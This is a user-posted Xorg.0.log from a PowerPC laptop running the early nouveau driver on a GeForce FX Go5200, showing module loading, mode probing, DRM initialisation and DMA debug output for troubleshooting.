Here is the Xorg.0.log. At the end there is a line that repeats many thousands of times I note that in the log instead of pasting all 5.5 MB.
X Window System Version 7.2.0
Release Date: 22 January 2007
X Protocol Version 11 Revision 0 Release 7.2
Build Operating System: Linux Ubuntu
Current Operating System: Linux bracket 2.6.20.7 #4 PREEMPT Sun Apr 22 23:36:26 CEST 2007 ppc
Build Date: 04 April 2007
	Before reporting problems check http://wiki.x.org
	to make sure that you have the latest version.
Module Loader present
Markers: (--) probed (**) from config file (==) default setting
	(++) from command line (!!) notice (II) informational
	(WW) warning (EE) error (NI) not implemented (??) unknown.
(==) Log file: /var/log/Xorg.0.log Time: Mon Apr 23 00:28:51 2007
(==) Using config file: /etc/X11/xorg.conf
(==) ServerLayout Krazy
(**) |--&gt;Screen Main screen (0)
(**) |   |--&gt;Monitor COLOR LCD
(**) |   |--&gt;Device NVIDIA Corporation NV34M [GeForce FX Go5200 Mac]
(**) |--&gt;Input Device Generic Keyboard
(**) |--&gt;Input Device Configured Mouse
(WW) The directory /usr/share/X11/fonts/cyrillic does not exist.
	Entry deleted from font path.
(WW) The directory /usr/share/X11/fonts/CID does not exist.
	Entry deleted from font path.
(WW) `fonts.dir' not found (or not valid) in /var/lib/defoma/x-ttcidfont-conf.d/dirs/CID.
	Entry deleted from font path.
	(Run 'mkfontdir' on /var/lib/defoma/x-ttcidfont-conf.d/dirs/CID).
(**) FontPath set to:
	unix/:7100
	/usr/share/X11/fonts/misc
	/usr/share/X11/fonts/100dpi/:unscaled
	/usr/share/X11/fonts/75dpi/:unscaled
	/usr/share/X11/fonts/Type1
	/usr/share/X11/fonts/100dpi
	/usr/share/X11/fonts/75dpi
	/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType
	/usr/share/fonts/X11/misc
	/usr/X11R6/lib/X11/fonts/misc
	/usr/share/fonts/X11/cyrillic
	/usr/share/fonts/X11/100dpi/:unscaled
	/usr/share/fonts/X11/75dpi/:unscaled
	/usr/share/fonts/X11/Type1
	/usr/X11R6/lib/X11/fonts/Type1
	/usr/share/fonts/X11/100dpi
	/usr/share/fonts/X11/75dpi
	/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType
(==) RgbPath set to /etc/X11/rgb
(==) ModulePath set to /usr/lib/xorg/modules
(**) Option AIGLX off
(II) Open APM successful
(II) Loader magic: 0x101d6f08
(II) Module ABI versions:
	X.Org ANSI C Emulation: 0.3
	X.Org Video Driver: 1.1
	X.Org XInput driver : 0.7
	X.Org Server Extension : 0.3
	X.Org Font Renderer : 0.5
(II) Loader running on linux
(II) LoadModule: pcidata
(II) Loading /usr/lib/xorg/modules//libpcidata.so
(II) Module pcidata: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.0
	ABI class: X.Org Video Driver version 1.1
(++) using VT number 7
(II) PCI: PCI scan (all values are in hex)
(II) PCI: 00:0b:0: chip 106b0034 card 00000000 rev 00 class 060000 hdr 00
(II) PCI: 00:10:0: chip 10de0329 card 10de0010 rev a1 class 030000 hdr 00
(II) PCI: End of PCI scan
(II) Host-to-PCI bridge:
(II) Bus 0: bridge is at (0:11:0) (000) BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 0 I/O range:
	[0] -1	0	0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) Bus 0 non-prefetchable memory range:
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
(II) Bus 0 prefetchable memory range:
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
(--) PCI:*(0:16:0) nVidia Corporation NV34M [GeForce FX Go5200] rev 161 Mem @ 0x91000000/24 0xa0000000/27 BIOS @ 0x90000000/17
(II) Addressable bus resource ranges are
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
	[1] -1	0	0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) OS-reported resource ranges:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[5] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
(II) Active PCI resource ranges:
	[0] -1	0	0x90000000 - 0x9001ffff (0x20000) MX[B](B)
	[1] -1	0	0xa0000000 - 0xa7ffffff (0x8000000) MX[B](B)
	[2] -1	0	0x91000000 - 0x91ffffff (0x1000000) MX[B](B)
(II) Active PCI resource ranges after removing overlaps:
	[0] -1	0	0x90000000 - 0x9001ffff (0x20000) MX[B](B)
	[1] -1	0	0xa0000000 - 0xa7ffffff (0x8000000) MX[B](B)
	[2] -1	0	0x91000000 - 0x91ffffff (0x1000000) MX[B](B)
(II) OS-reported resource ranges after removing overlaps with PCI:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[5] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
(II) All system resource ranges:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x90000000 - 0x9001ffff (0x20000) MX[B](B)
	[5] -1	0	0xa0000000 - 0xa7ffffff (0x8000000) MX[B](B)
	[6] -1	0	0x91000000 - 0x91ffffff (0x1000000) MX[B](B)
	[7] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[8] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
(II) LoadModule: dbe
(II) Loading /usr/lib/xorg/modules/extensions//libdbe.so
(II) Module dbe: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension DOUBLE-BUFFER
(II) LoadModule: ddc
(II) Loading /usr/lib/xorg/modules//libddc.so
(II) Module ddc: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.0
	ABI class: X.Org Video Driver version 1.1
(II) LoadModule: dri
(II) Loading /usr/lib/xorg/modules/extensions//libdri.so
(II) Module dri: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.0
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension XFree86-DRI
(II) LoadModule: extmod
(II) Loading /usr/lib/xorg/modules/extensions//libextmod.so
(II) Module extmod: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension SHAPE
(II) Loading extension MIT-SUNDRY-NONSTANDARD
(II) Loading extension BIG-REQUESTS
(II) Loading extension SYNC
(II) Loading extension MIT-SCREEN-SAVER
(II) Loading extension XC-MISC
(II) Loading extension XFree86-VidModeExtension
(II) Loading extension XFree86-Misc
(II) Loading extension XFree86-DGA
(II) Loading extension DPMS
(II) Loading extension TOG-CUP
(II) Loading extension Extended-Visual-Information
(II) Loading extension XVideo
(II) Loading extension XVideo-MotionCompensation
(II) Loading extension X-Resource
(II) LoadModule: freetype
(II) Loading /usr/lib/xorg/modules//fonts/libfreetype.so
(II) Module freetype: vendor=X.Org Foundation &amp; the After X-TT Project
	compiled for 7.2.0 module version = 2.1.0
	Module class: X.Org Font Renderer
	ABI class: X.Org Font Renderer version 0.5
(II) Loading font FreeType
(II) LoadModule: glx
(II) Loading /usr/lib/xorg/modules/extensions//libglx.so
(II) Module glx: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.0
	ABI class: X.Org Server Extension version 0.3
(**) AIGLX disabled
(II) Loading extension GLX
(II) LoadModule: int10
(II) Loading /usr/lib/xorg/modules//libint10.so
(II) Module int10: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.0
	ABI class: X.Org Video Driver version 1.1
(II) LoadModule: record
(II) Loading /usr/lib/xorg/modules/extensions//librecord.so
(II) Module record: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.13.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension RECORD
(II) LoadModule: type1
(II) Loading /usr/lib/xorg/modules//fonts/libtype1.so
(II) Module type1: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.2
	Module class: X.Org Font Renderer
	ABI class: X.Org Font Renderer version 0.5
(II) Loading font Type1
(II) LoadModule: v4l
(II) Loading /usr/lib/xorg/modules/drivers//v4l_drv.so
(II) Module v4l: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 0.1.1
	ABI class: X.Org Video Driver version 1.1
(II) LoadModule: vbe
(II) Loading /usr/lib/xorg/modules//libvbe.so
(II) Module vbe: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.1.0
	ABI class: X.Org Video Driver version 1.1
(II) LoadModule: nouveau
(II) Loading /usr/lib/xorg/modules/drivers//nouveau_drv.so
(II) Module nouveau: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.2.0
	Module class: X.Org Video Driver
	ABI class: X.Org Video Driver version 1.1
(II) LoadModule: kbd
(II) Loading /usr/lib/xorg/modules/input//kbd_drv.so
(II) Module kbd: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.1.0
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 0.7
(II) LoadModule: mouse
(II) Loading /usr/lib/xorg/modules/input//mouse_drv.so
(II) Module mouse: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.1.1
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 0.7
(II) v4l driver for Video4Linux
(II) NOUVEAU driver Date:   Sun Apr 15 23:01:52 2007 +0200
(II) NOUVEAU driver for NVIDIA chipset families :
	RIVA 128    (NV03)
	RIVA TNT    (NV04)
	RIVA TNT2   (NV05)
	GeForce 256 (NV10)
	GeForce 2   (NV11 NV15)
	GeForce 4MX (NV17 NV18)
	GeForce 3   (NV20)
	GeForce 4Ti (NV25 NV28)
	GeForce FX  (NV3x)
	GeForce 6   (NV4x)
	GeForce 7   (G7x)
(II) Primary Device is: PCI 00:10:0
(--) Assigning device section with no busID to primary device
(--) Chipset GeForce FX 5200 (Mac) found
(II) resource ranges after xf86ClaimFixedResources() call:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x90000000 - 0x9001ffff (0x20000) MX[B](B)
	[5] -1	0	0xa0000000 - 0xa7ffffff (0x8000000) MX[B](B)
	[6] -1	0	0x91000000 - 0x91ffffff (0x1000000) MX[B](B)
	[7] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[8] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
(II) resource ranges after probing:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x90000000 - 0x9001ffff (0x20000) MX[B](B)
	[5] -1	0	0xa0000000 - 0xa7ffffff (0x8000000) MX[B](B)
	[6] -1	0	0x91000000 - 0x91ffffff (0x1000000) MX[B](B)
	[7] 0	0	0x000a0000 - 0x000affff (0x10000) MS[B]
	[8] 0	0	0x000b0000 - 0x000b7fff (0x8000) MS[B]
	[9] 0	0	0x000b8000 - 0x000bffff (0x8000) MS[B]
	[10] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[11] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[12] 0	0	0xf00003b0 - 0xf00003bb (0xc) IS[B]
	[13] 0	0	0xf00003c0 - 0xf00003df (0x20) IS[B]
(II) Setting vga for screen 0.
(II) Loading sub module int10
(II) LoadModule: int10
(II) Reloading /usr/lib/xorg/modules//libint10.so
(--) NOUVEAU(0): Chipset: GeForce FX 5200 (Mac)
(**) NOUVEAU(0): Depth 24 (--) framebuffer bpp 32
(==) NOUVEAU(0): RGB weight 888
(==) NOUVEAU(0): Default visual is TrueColor
(II) Loading sub module vgahw
(II) LoadModule: vgahw
(II) Loading /usr/lib/xorg/modules//libvgahw.so
(II) Module vgahw: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 0.1.0
	ABI class: X.Org Video Driver version 1.1
(**) NOUVEAU(0): Option FPDither 1
(==) NOUVEAU(0): Using HW cursor
(==) NOUVEAU(0): Using EXA acceleration method
(**) NOUVEAU(0): enabling flat panel dither
(--) NOUVEAU(0): Linear framebuffer at 0xA0000000
(--) NOUVEAU(0): MMIO registers at 0x91000000
(II) Loading sub module dri
(II) LoadModule: dri
(II) Reloading /usr/lib/xorg/modules/extensions//libdri.so
(II) NOUVEAU(0): Loaded DRI module
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 6 (OK)
drmOpenByBusid: Searching for BusID pci:0000:00:10.0
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 6 (OK)
drmOpenByBusid: drmOpenMinor returns 6
drmOpenByBusid: drmGetBusid reports pci:0000:00:10.0
(II) NOUVEAU(0): [dri] Found DRI library version 1.3.0 and kernel module version 0.0.6
(II) NOUVEAU(0): BIOS signature not found!
(II) Loading sub module i2c
(II) LoadModule: i2c
(II) Loading /usr/lib/xorg/modules//libi2c.so
(II) Module i2c: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.2.0
	ABI class: X.Org Video Driver version 1.1
(II) Loading sub module ddc
(II) LoadModule: ddc
(II) Reloading /usr/lib/xorg/modules//libddc.so
(II) NOUVEAU(0): I2C bus DDC initialized.
(II) NOUVEAU(0): Probing for analog device on output A...
(--) NOUVEAU(0):   ...can't find one
(II) NOUVEAU(0): Probing for analog device on output B...
(--) NOUVEAU(0):   ...found one
(II) NOUVEAU(0): Probing for EDID on I2C bus A...
(II) NOUVEAU(0): I2C device DDC:ddc2 registered at address 0xA0.
(II) NOUVEAU(0): I2C device DDC:ddc2 removed.
(II) NOUVEAU(0):   ... none found
(II) NOUVEAU(0): Probing for EDID on I2C bus B...
(II) NOUVEAU(0): I2C device DDC:ddc2 registered at address 0xA0.
(II) NOUVEAU(0): I2C device DDC:ddc2 removed.
(II) NOUVEAU(0):   ... none found
(--) NOUVEAU(0): CRTC 1 is currently programmed for DFP
(II) NOUVEAU(0): Using DFP on CRTC 1
(--) NOUVEAU(0): Panel size is 1024 x 768
(II) NOUVEAU(0): Panel is TMDS
(--) NOUVEAU(0): VideoRAM: 65536 kBytes
(==) NOUVEAU(0): Using gamma correction (1.0 1.0 1.0)
(II) NOUVEAU(0): COLOR LCD: Using hsync range of 28.00-96.00 kHz
(II) NOUVEAU(0): COLOR LCD: Using vrefresh range of 43.00-75.00 Hz
(II) NOUVEAU(0): Clock range:  12.00 to 350.00 MHz
(II) NOUVEAU(0): Not using default mode 640x350 (vrefresh out of range)
(II) NOUVEAU(0): Not using default mode 320x175 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 640x400 (vrefresh out of range)
(II) NOUVEAU(0): Not using default mode 320x200 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 720x400 (vrefresh out of range)
(II) NOUVEAU(0): Not using default mode 360x200 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 320x240 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 320x240 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 320x240 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 640x480 (vrefresh out of range)
(II) NOUVEAU(0): Not using default mode 320x240 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 400x300 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 400x300 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 400x300 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 400x300 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 800x600 (vrefresh out of range)
(II) NOUVEAU(0): Not using default mode 400x300 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1024x768 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 512x384 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 512x384 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 512x384 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 512x384 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1024x768 (vrefresh out of range)
(II) NOUVEAU(0): Not using default mode 512x384 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1152x864 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 576x432 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1280x960 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 640x480 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1280x960 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 640x480 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1280x1024 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 640x512 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1280x1024 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 640x512 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1280x1024 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 640x512 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1600x1200 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 800x600 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1600x1200 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 800x600 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1600x1200 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 800x600 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1600x1200 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 800x600 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1600x1200 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 800x600 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1792x1344 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 896x672 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1792x1344 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 896x672 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1856x1392 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 928x696 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1856x1392 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 928x696 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1920x1440 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 960x720 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1920x1440 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 960x720 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 416x312 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1280x768 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 640x384 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1280x800 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 640x400 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1152x768 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 576x384 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1152x864 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 576x432 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1400x1050 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 700x525 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1400x1050 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 700x525 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1400x1050 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 700x525 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1400x1050 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 700x525 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1440x900 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 720x450 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1600x1024 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 800x512 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1680x1050 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 840x525 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1920x1200 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 960x600 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1920x1200 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 960x600 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1920x1440 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 960x720 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 2048x1536 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 1024x768 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 2048x1536 (exceeds panel dimensions)
(II) NOUVEAU(0): Not using default mode 1024x768 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 2048x1536 (bad mode clock/interlace/doublescan)
(II) NOUVEAU(0): Not using default mode 1024x768 (bad mode clock/interlace/doublescan)
(--) NOUVEAU(0): Virtual size is 1024x768 (pitch 1024)
(**) NOUVEAU(0): *Default mode 1024x768: 78.8 MHz 60.0 kHz 75.0 Hz
(II) NOUVEAU(0): Modeline 1024x768   78.75  1024 1040 1136 1312  768 769 772 800 +hsync +vsync
(**) NOUVEAU(0): *Default mode 800x600: 49.5 MHz 46.9 kHz 75.0 Hz
(II) NOUVEAU(0): Modeline 800x600   49.50  800 816 896 1056  600 601 604 625 +hsync +vsync
(**) NOUVEAU(0): *Default mode 640x480: 31.5 MHz 37.5 kHz 75.0 Hz
(II) NOUVEAU(0): Modeline 640x480   31.50  640 656 720 840  480 481 484 500 -hsync -vsync
(**) NOUVEAU(0):  Default mode 1024x768: 75.0 MHz 56.5 kHz 70.1 Hz
(II) NOUVEAU(0): Modeline 1024x768   75.00  1024 1048 1184 1328  768 771 777 806 -hsync -vsync
(**) NOUVEAU(0):  Default mode 1024x768: 65.0 MHz 48.4 kHz 60.0 Hz
(II) NOUVEAU(0): Modeline 1024x768   65.00  1024 1048 1184 1344  768 771 777 806 -hsync -vsync
(**) NOUVEAU(0):  Default mode 832x624: 57.3 MHz 49.7 kHz 74.6 Hz
(II) NOUVEAU(0): Modeline 832x624   57.28  832 864 928 1152  624 625 628 667 -hsync -vsync
(**) NOUVEAU(0):  Default mode 800x600: 50.0 MHz 48.1 kHz 72.2 Hz
(II) NOUVEAU(0): Modeline 800x600   50.00  800 856 976 1040  600 637 643 666 +hsync +vsync
(**) NOUVEAU(0):  Default mode 800x600: 40.0 MHz 37.9 kHz 60.3 Hz
(II) NOUVEAU(0): Modeline 800x600   40.00  800 840 968 1056  600 601 605 628 +hsync +vsync
(**) NOUVEAU(0):  Default mode 800x600: 36.0 MHz 35.2 kHz 56.2 Hz
(II) NOUVEAU(0): Modeline 800x600   36.00  800 824 896 1024  600 601 603 625 +hsync +vsync
(**) NOUVEAU(0):  Default mode 640x480: 31.5 MHz 37.9 kHz 72.8 Hz
(II) NOUVEAU(0): Modeline 640x480   31.50  640 664 704 832  480 489 492 520 -hsync -vsync
(**) NOUVEAU(0):  Default mode 640x480: 25.2 MHz 31.5 kHz 59.9 Hz
(II) NOUVEAU(0): Modeline 640x480   25.18  640 656 752 800  480 490 492 525 -hsync -vsync
(==) NOUVEAU(0): DPI set to (75 75)
(II) Loading sub module fb
(II) LoadModule: fb
(II) Loading /usr/lib/xorg/modules//libfb.so
(II) Module fb: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 1.0.0
	ABI class: X.Org ANSI C Emulation version 0.3
(II) Loading sub module exa
(II) LoadModule: exa
(II) Loading /usr/lib/xorg/modules//libexa.so
(II) Module exa: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 2.0.0
	ABI class: X.Org Video Driver version 1.1
(II) Loading sub module ramdac
(II) LoadModule: ramdac
(II) Loading /usr/lib/xorg/modules//libramdac.so
(II) Module ramdac: vendor=X.Org Foundation
	compiled for 7.2.0 module version = 0.1.0
	ABI class: X.Org Video Driver version 1.1
(--) Depth 24 pixmap format is 32 bpp
(II) do I need RAC?  No I don't.
(II) resource ranges after preInit:
	[0] 0	0	0xa0000000 - 0xa7ffffff (0x8000000) MX[B]
	[1] 0	0	0x91000000 - 0x91ffffff (0x1000000) MX[B]
	[2] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[3] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[4] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[5] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[6] -1	0	0x90000000 - 0x9001ffff (0x20000) MX[B](B)
	[7] -1	0	0xa0000000 - 0xa7ffffff (0x8000000) MX[B](B)
	[8] -1	0	0x91000000 - 0x91ffffff (0x1000000) MX[B](B)
	[9] 0	0	0x000a0000 - 0x000affff (0x10000) MS[B](OprD)
	[10] 0	0	0x000b0000 - 0x000b7fff (0x8000) MS[B](OprD)
	[11] 0	0	0x000b8000 - 0x000bffff (0x8000) MS[B](OprD)
	[12] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[13] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[14] 0	0	0xf00003b0 - 0xf00003bb (0xc) IS[B](OprU)
	[15] 0	0	0xf00003c0 - 0xf00003df (0x20) IS[B](OprU)
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 6 (OK)
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 6 (OK)
drmOpenByBusid: Searching for BusID pci:0000:00:10.0
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 6 (OK)
drmOpenByBusid: drmOpenMinor returns 6
drmOpenByBusid: drmGetBusid reports pci:0000:00:10.0
(II) NOUVEAU(0): [drm] DRM interface version 1.3
(II) NOUVEAU(0): [drm] created nouveau driver at busid pci:0000:00:10.0
(II) NOUVEAU(0): [drm] added 8192 byte SAREA at 0xe646c000
(II) NOUVEAU(0): [drm] mapped SAREA 0xe646c000 to 0x30023000
(II) NOUVEAU(0): [drm] framebuffer handle = 0xa0000000
(II) NOUVEAU(0): [drm] added 1 reserved context for kernel
(II) NOUVEAU(0): IRQ handler initialised.  IRQ 48
(II) NOUVEAU(0): Allocated 32MiB VRAM for framebuffer + offscreen pixmaps
(II) NOUVEAU(0): AGP: 32MiB available
(II) NOUVEAU(0): AGP: mapped 16MiB at 0x33060000
(II) NOUVEAU(0): Using FIFO channel 0
(II) NOUVEAU(0):   Control registers : 0x34078000 (0x91800000)
(II) NOUVEAU(0):   DMA command buffer: 0x34070000 (0xa2014000)
(II) NOUVEAU(0):   DMA cmdbuf length : 32 KiB
(II) NOUVEAU(0):   DMA base PUT      : 0x00000000
	NVDmaNext: @0x00000000  0x00000000
	NVDmaNext: @0x00000001  0x00000000
	NVDmaNext: @0x00000002  0x00000000
	NVDmaNext: @0x00000003  0x00000000
	NVDmaNext: @0x00000004  0x00000000
	NVDmaNext: @0x00000005  0x00000000
	NVDmaNext: @0x00000006  0x00000000
	NVDmaNext: @0x00000007  0x00000000
NVDmaStart: subc=0 cmd=0 num=1
	NVDmaNext: @0x00000008  0x00040000
	NVDmaNext: @0x00000009  0x80000010
NVDmaStart: subc=0 cmd=180 num=1
	NVDmaNext: @0x0000000a  0x00040180
	NVDmaNext: @0x0000000b  0x00000000
NVDmaStart: subc=0 cmd=184 num=2
	NVDmaNext: @0x0000000c  0x00080184
	NVDmaNext: @0x0000000d  0xd8000001
	NVDmaNext: @0x0000000e  0xd8000001
NVDmaStart: subc=4 cmd=0 num=1
	NVDmaNext: @0x0000000f  0x00048000
	NVDmaNext: @0x00000010  0x80000012
NVDmaStart: subc=4 cmd=180 num=1
	NVDmaNext: @0x00000011  0x00048180
